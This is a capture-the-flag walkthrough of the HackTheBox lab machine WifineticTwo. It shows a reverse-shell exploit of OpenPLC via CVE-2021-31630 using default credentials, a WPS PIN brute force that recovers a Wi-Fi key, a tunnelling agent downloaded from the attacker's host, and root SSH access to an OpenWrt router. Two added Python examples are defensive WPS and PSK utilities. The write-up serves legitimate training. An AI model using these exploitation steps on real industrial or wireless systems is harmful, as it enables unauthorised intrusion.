Dark_Man

HTB - WifineticTwo


Last updated 10 months ago

Machine Info

WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of [CVE-2021-31630]. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.

Enumeration


Scope

IP Address: 10.10.11.7

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
8080/tcp open  http-proxy syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login
<SNIP>
* Open ports: 22, 8080
* Services: SSH, HTTP
* Important notes: OpenPLC

Adding the hostname to /etc/hosts:
┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ sudo sh -c "echo  '$ip wifinetictwo.htb' >> /etc/hosts"

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/CVE-2021-31630-HTB]
└─$ tail -n1 /etc/hosts
10.10.11.7 wifinetictwo.htb

http://10.10.11.7:8080/login

A quick search for OpenPLC CVEs:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ searchsploit OpenPLC                        
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenPLC 3 - Remote Code Execution (Authenticated)                                                                                                          | python/webapps/49803.py
OpenPLC WebServer 3 - Denial of Service                                                                                                                    | multiple/dos/51746.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Initial Access

I don't have credentials yet, so I tried the default ones, openplc:openplc, and they worked.

http://10.10.11.7:8080/dashboard

The exploit we found needs credentials; now that I have them, I can run it.

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ git clone https://github.com/thewhiteh4t/cve-2021-31630.git
<snip>

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo/cve-2021-31630]
└─$ python3 cve_2021_31630.py -u openplc -p openplc -lh 10.10.16.7 -lp 443 http://10.10.11.7:8080

------------------------------------------------
--- CVE-2021-31630 -----------------------------
--- OpenPLC WebServer v3 - Authenticated RCE ---
------------------------------------------------
[>] Found By : Fellipe Oliveira
[>] PoC By   : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target   : http://10.10.11.7:8080
[>] Username : openplc
[>] Password : openplc
[>] Timeout  : 200 secs
[>] LHOST    : 10.10.16.7
[>] LPORT    : 443

[!] Checking status...
[+] Service is Online!
[!] Logging in...
[+] Logged in!
[!] Restoring default program...
[+] PLC Stopped!
[+] Cleanup successful!
[!] Uploading payload...
[+] Payload uploaded!
[+] Waiting for 5 seconds...
[+] Compilation successful!
[!] Starting PLC...
[+] PLC Started! Check listener...
[!] Cleaning up...
[+] PLC Stopped!
[+] Cleanup successful! 

Receive the connection

┌──(kali㉿kali)-[~/study/Courses/HackThebox/HTB/machines/WifineticTwo]
└─$ nc -lvnp 443                                                                                                                                                                             
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.7] 47504
id
uid=0(root) gid=0(root) groups=0(root)  

Upgrade the shell

script /dev/null -c bash
Ctrl+z
stty -echo raw; fg
reset
Terminal type? screen
stty rows 37 columns 189
export TERM=xterm-256color

I found myself running commands as root; maybe I'm in a Docker container or some other kind of virtualization.

The user flag is in the /root directory:

root@attica01:/# ls /root
user.txt
root@attica01:~# cat user.txt 
850e68329cf676exxxxxxxxxxxxxxxx

User Flag: 850e68329cf676exxxxxxxxxxxxxxxx


Privilege Escalation

The machine's IP address is not here, which makes me sure I'm not on the actual host. There is also a wlan0 interface.

root@attica01:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.2  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefc:910c  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fc:91:0c  txqueuelen 1000  (Ethernet)
        RX packets 5716  bytes 529625 (529.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4286  bytes 1207374 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 715  bytes 39478 (39.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 715  bytes 39478 (39.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

I uploaded linpeas.sh to the box to enumerate and collect useful info from the host, but didn't find anything interesting.

linpeas.sh tells me that it's a virtual machine (lxc):

═╣ Is this a virtual machine? ..... Yes (lxc) 

Enumerating installed programs shows that there are wireless tools here:

root@attica01:~$ apt list --installed | cut -d"/" -f1,3

<snip>
whiptail
wireless-regdb
wireless-tools
wpasupplicant
<snip>

Following this post (Connect Wi-Fi Network From Terminal, linked at the bottom of the page), I was able to work with the wireless interface on that host:

root@attica01:~$ iw wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 4928.704s [boottime]
        TSF: 1721706237223201 usec (19927d, 03:43:57)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0
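The detail in that scan that matters for the next step is the WPS block: state 2 (Configured) together with PIN-style config methods (Label, Display, Keypad) means the AP will run the external-registrar PIN exchange. That is the property a defender wants to flag during a wireless audit, and the fix is to disable WPS on the AP. The parser below is an added example, not part of the original writeup: it splits `iw dev wlan0 scan` output into one record per BSS and reports APs that advertise a configured WPS registrar with a PIN method. The first BSS in the sample is copied from the scan above; the second (`aa:bb:cc:dd:ee:ff`, `constructed-safe-ap`) is a constructed control entry with no WPS block.

```python
import re

# Constructed sample: first BSS copied from the writeup's `iw wlan0 scan` output,
# trimmed to the lines the parser uses; second BSS is an invented control entry.
SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
        freq: 2412
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        SSID: plcrouter
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0
BSS aa:bb:cc:dd:ee:ff(on wlan0)
        freq: 2437
        signal: -70.00 dBm
        SSID: constructed-safe-ap
        RSN:     * Version: 1
                 * Authentication suites: PSK
"""

# WPS config methods that expose a PIN-based registrar exchange.
PIN_METHODS = {"Label", "Display", "Keypad"}


def parse_iw_scan(text):
    """Split `iw dev <iface> scan` output into one dict per BSS."""
    networks = []
    current = None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            current = {"bssid": m.group(1), "ssid": None, "auth": None,
                       "wps_state": None, "config_methods": []}
            networks.append(current)
            continue
        if current is None:
            continue
        s = line.strip()
        if s.startswith("SSID: "):
            current["ssid"] = s[len("SSID: "):]
        elif s.startswith("* Authentication suites: "):
            current["auth"] = s.split(": ", 1)[1]
        elif s.startswith("* Wi-Fi Protected Setup State: "):
            current["wps_state"] = s.split(": ", 1)[1]
        elif s.startswith("* Config methods: "):
            current["config_methods"] = [c.strip() for c in s.split(": ", 1)[1].split(",")]
    return networks


def wps_findings(networks):
    """Return (bssid, ssid, reason) for APs with a configured WPS registrar and a PIN method."""
    findings = []
    for n in networks:
        if n["wps_state"] and n["wps_state"].startswith("2"):
            exposed = PIN_METHODS & set(n["config_methods"])
            if exposed:
                reason = "WPS configured with PIN config methods: " + ", ".join(sorted(exposed))
                findings.append((n["bssid"], n["ssid"], reason))
    return findings


if __name__ == "__main__":
    for bssid, ssid, reason in wps_findings(parse_iw_scan(SAMPLE_SCAN)):
        print(f"[!] {bssid} ({ssid}): {reason}")
```

Run it against real output with `iw dev wlan0 scan | python3 wps_audit.py` after swapping `SAMPLE_SCAN` for `sys.stdin.read()`; any AP listed is one whose WPS should be turned off in its configuration.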

I got a hint from the community about the oneshot tool, which brute-forces the WPS PIN.

root@attica01:~$ python3 oneshot.py -i wlan0
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Networks list:
#    BSSID              ESSID                     Sec.     PWR  WSC device name             WSC model
1)   02:00:00:00:01:00  plcrouter                 WPA2     -30                                 
Select target (press Enter to refresh): 1   
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[*] Sending WPS Message M2…
[*] Received WPS Message M3
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'NoWWEDoKnowWhaxxxxxxxxxxx'
[+] AP SSID: 'plcrouter'

Connect to the plcrouter network

root@attica01:~$ wpa_passphrase plcrouter >> /etc/wpa_supplicant/wpa_supplicant.conf                                                
# reading passphrase from stdin
NoWWEDoKnowWhaxxxxxxxxxxx

root@attica01:~$ wpa_supplicant -B -D wext -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf

Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
ioctl[SIOCSIWENCODEEXT]: Invalid argument
ioctl[SIOCSIWENCODEEXT]: Invalid argument
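`wpa_passphrase` does not store the passphrase in the network block; it writes the 256-bit PSK derived from it with PBKDF2-HMAC-SHA1, using the SSID as salt, 4096 iterations and a 32-byte output (IEEE 802.11i). The added example below is not part of the writeup: it reproduces that derivation with Python's hashlib, emits a network stanza that holds only the hex PSK, and strips the `#psk="..."` comment line that `wpa_passphrase` prints alongside the hash, so the plaintext passphrase never lands in the config file. The test vector (SSID `IEEE`, passphrase `password`) is the one published in the 802.11i specification; the `plcrouter` passphrase used in the `main` block is a constructed placeholder, not the real one.

```python
import hashlib
import re

PSK_ITERATIONS = 4096  # fixed by IEEE 802.11i
PSK_LENGTH = 32        # bytes; the PSK doubles as the 256-bit PMK


def wpa2_psk(ssid: str, passphrase: str) -> str:
    """Derive the WPA2-Personal PSK from SSID and passphrase, as wpa_passphrase does."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PSK_ITERATIONS, PSK_LENGTH).hex()


def network_block(ssid: str, passphrase: str) -> str:
    """wpa_supplicant network stanza containing only the derived hex PSK."""
    return ("network={\n"
            f'\tssid="{ssid}"\n'
            f"\tpsk={wpa2_psk(ssid, passphrase)}\n"
            "}\n")


def strip_plaintext_psk(config: str) -> str:
    """Drop the `#psk="..."` comment lines wpa_passphrase emits next to the hex psk."""
    return "".join(line for line in config.splitlines(keepends=True)
                   if not re.match(r'\s*#psk=', line))


if __name__ == "__main__":
    # Constructed placeholder passphrase; the real one is redacted in the writeup.
    print(network_block("plcrouter", "constructed-placeholder-passphrase"), end="")
```

The hex PSK is still a credential (it is exactly what the four-way handshake uses), so the config file should be owned by root with mode 600 regardless of which form it holds; the gain from stripping the comment is only that the human-memorable passphrase, which is often reused elsewhere, is not exposed.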

Verify successful connection

root@attica01:~# iw wlan0 link
Connected to 02:00:00:00:01:00 (on wlan0)
        SSID: plcrouter
        freq: 2412
        RX: 16029 bytes (229 packets)
        TX: 1116 bytes (11 packets)
        signal: -30 dBm
        rx bitrate: 1.0 MBit/s
        tx bitrate: 12.0 MBit/s

        bss flags:      short-slot-time
        dtim period:    2
        beacon int:     100

But I didn't get an IP address:

root@attica01:~# ip addr show wlan0
5: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::ff:fe00:200/64 scope link 
       valid_lft forever preferred_lft forever

Adding one manually.

I wasn't sure which subnet the interface should be in, so I decided to just try one.

root@attica01:~$ ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
root@attica01:~$ ifconfig wlan0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.5  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:200  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:02:00  txqueuelen 1000  (Ethernet)

I set up a tunnel with ligolo-ng to enumerate the new network from my Kali machine.

┌──(kali㉿kali)-[~/…/Tools/Pivot/ligolo-ng]
└─$ ./proxy-server -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng »
root@attica01:~$ curl 10.10.16.7/agent.sh -o agent.sh
root@attica01:~$ chmod +x agent.sh
root@attica01:~$ ./agent.sh -connect 10.10.16.7:11601 -ignore-cert
ligolo-ng » session
1
ligolo-ng » start

Add the network route to the ligolo interface and ping sweep the network with fping:

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ sudo ip route add 192.168.1.0/24 dev ligolo

┌──(kali㉿kali)-[~/…/HTB/machines/WifineticTwo]
└─$ fping -asgq 192.168.1.0/24

192.168.1.1
192.168.1.5

192.168.1.5 is the IP I assigned to the wlan0 interface, so I will target 192.168.1.1.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ nmap 192.168.1.1 -F -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 00:19 EDT
Nmap scan report for 192.168.1.1
Host is up (0.10s latency).
Not shown: 92 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
7/tcp     filtered echo
22/tcp    open     ssh
53/tcp    open     domain
80/tcp    open     http
443/tcp   open     https
514/tcp   filtered shell
2001/tcp  filtered dc
49154/tcp filtered unknown

I found SSH is open, so I tried to connect to it as root:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/WifineticTwo]
└─$ ssh root@192.168.1.1                       
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts.

BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash)

  _______                     ________        __
 |       |.-----.-----.-----.|  |  |  |.----.|  |_
 |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
 |_______||   __|_____|__|__||________||__|  |____|
          |__| W I R E L E S S   F R E E D O M
 -----------------------------------------------------
 OpenWrt 23.05.2, r23630-842932a63d
 -----------------------------------------------------
=== WARNING! =====================================
There is no root password defined on this device!
Use the "passwd" command to set up a new password
in order to prevent unauthorized SSH logins.
--------------------------------------------------
root@ap:~# 
root@ap:~$ cat root.txt 
bd361577bf4d8653xxxxxxxxxxxxxxxx

Root Flag: bd361577bf4d8653xxxxxxxxxxxxxxxx

References

GitHub - thewhiteh4t/cve-2021-31630: Python script for exploiting command injection in Open PLC Webserver v3
Connect Wi-Fi Network From Terminal – Kali Linux - Yeah Hub